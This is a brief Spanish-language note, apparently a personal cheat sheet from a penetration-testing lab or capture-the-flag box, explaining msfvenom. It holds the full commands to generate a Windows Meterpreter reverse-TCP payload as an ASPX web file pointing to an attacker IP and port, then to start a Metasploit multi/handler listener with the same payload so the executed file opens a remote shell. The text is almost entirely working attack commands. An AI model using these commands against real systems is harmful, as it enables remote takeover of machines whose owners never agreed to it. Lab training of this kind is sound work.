Es una combinación de un generador de paylods con un encoder.

la sintaxis

root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.9 LPORT=1234 -f aspx > devel2.aspx
msf exploit(multi/handler) > use multi/handler
Y PONES EL MISMO PAYLOAD QUE HABIAS PUESTO
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
show options

y luego ejecutar el archivo y se conecta.